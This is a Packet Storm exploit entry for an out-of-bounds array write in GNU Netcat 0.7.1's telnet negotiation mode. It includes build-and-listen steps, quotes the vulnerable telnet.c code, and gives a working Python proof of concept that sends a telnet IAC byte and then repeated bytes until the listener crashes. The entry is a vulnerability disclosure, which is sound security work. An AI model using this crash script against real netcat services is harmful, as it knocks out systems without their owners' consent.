GNU Netcat 0.7.1 Out-Of-Bounds Write

2016-12-05T00:00:00
ID PACKETSTORM:140025
Type packetstorm
Reporter n30m1nd
Modified 2016-12-05T00:00:00

Description

                                        
                                            `#/usr/bin/python  
#-*- Coding: utf-8 -*-  
  
### GNU Netcat 0.7.1 - Out of bounds array write (Access Violation) by n30m1nd ###   
  
# Date: 2016-11-19  
# Exploit Author: n30m1nd  
# Vendor Homepage: http://netcat.sourceforge.net/  
# Software Link: https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download  
# Version: 0.7.1  
# Tested on: Debian 3.16.36-1+deb8u2 (2016-10-19) x86_64 GNU/Linux  
  
# Credits  
# =======  
# Props to Giovanni and Armando creators of this useful piece of software, thank you guys!  
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better. See you at AWE!  
  
# How to  
# ======  
# * Get a distribution that ships with gnu netcat or Compile netcat from sources:  
# * # Download  
# * tar -xzf netcat-0.7.1.tar.gz  
# * cd netcat-0.7.1/  
# * ./configure  
# * make  
# * # Netcat will be deployed in src/netcat  
#  
# * Set netcat to listen like the following:  
# * ./netcat -nlvp 12347 -T  
# * Just run this script on a different terminal  
#  
  
# Why?  
# ====  
# When the Telnet Negotiation is activated (-T option), Netcat parses the incoming packets looking for Telnet Control Codes  
# by running them through buggy switch/case code.   
# Aforementioned code fails to safely check for array boundaries resulting in an array out of bounds write.  
  
# Vulnerable code  
# ===============  
# telnet.c  
# ...  
# 76 static unsigned char getrq[4];  
# 77 static int l = 0;  
# 78 unsigned char putrq[4], *buf = ncsock->recvq.pos;  
# ...  
# 88 /* loop all chars of the string */  
# 89 for (i = 0; i < ref_size; i++) {  
# 90 /* if we found IAC char OR we are fetching a IAC code string process it */  
# 91 if ((buf[i] != TELNET_IAC) && (l == 0))  
# ...  
#100 getrq[l++] = buf[i]; // BANG!  
# 99 /* copy the char in the IAC-code-building buffer */  
# ...  
# 76 static unsigned char getrq[4];  
# 77 static int l = 0;  
# 78 unsigned char putrq[4], *buf = ncsock->recvq.pos;  
  
# Exploit code  
# ============  
  
import socket  
  
RHOST = "127.0.0.1"  
RPORT = 12347  
  
print("[+] Connecting to %s:%d") % (RHOST, RPORT)  
s = socket.create_connection((RHOST, RPORT))  
s.send("\xFF") # Telnet control character  
print("[+] Telnet control character sent")  
print("[i] Starting")  
try:  
i = 0  
while True: # Loop until it crashes  
i += 1  
s.send("\x30")  
except:  
print("[+] GNU Netcat crashed on iteration: %d") % (i)  
  
`